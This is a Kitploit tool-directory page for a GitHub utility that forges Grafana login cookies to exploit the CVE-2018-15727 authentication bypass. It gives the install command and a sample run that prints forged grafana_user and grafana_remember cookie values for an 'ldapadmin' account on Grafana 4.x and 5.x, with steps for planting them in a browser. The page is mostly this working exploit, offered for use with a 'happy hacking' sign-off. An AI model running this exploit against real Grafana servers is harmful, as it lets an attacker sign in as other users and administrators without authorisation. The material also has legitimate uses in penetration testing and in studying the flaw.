Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
grafana-CVE-2018-15727 — a small utility to generate a cookie in order to exploit a grafana vulnerability (CVE-2018-15727) | Kitploit
Tools/GitHubGitHub/u238/grafana-cve-2018-15727
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingAuthentication
GitHubu238/grafana-cve-2018-15727

grafana-CVE-2018-15727

a small utility to generate a cookie in order to exploit a grafana vulnerability (CVE-2018-15727)

View Repository
2277 years agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Grafana CVE-2018-15727 exploit

Installation

root@kitploit:~
$ go get github.com/u238/grafana-CVE-2018-15727

Usage

root@kitploit:~
$ source <(go env)
$ $GOPATH/bin/grafana-CVE-2018-15727 ldapadmin
[i] delete the grafana_sess cookie from your browser session
[i] set following cookies in you browser:
 * for Grafana 5.x:
   grafana_user      : ldapadmin
   grafana_remember  : 8947f2c6b81963b2a45f4293ced63802f0c923daa368a9beda748800335fc72c06ea186e43
 * for Grafana 4.x:
   grafana_user      : ldapadmin
   grafana_remember  : 8d26614cd6a92aaf892eebb066ae17ed65ef6c9bea73f875ed6698a907d807db0026787fc3
[+] happy hacking ;) 

LICENSE

See LICENSE file.

Download Tool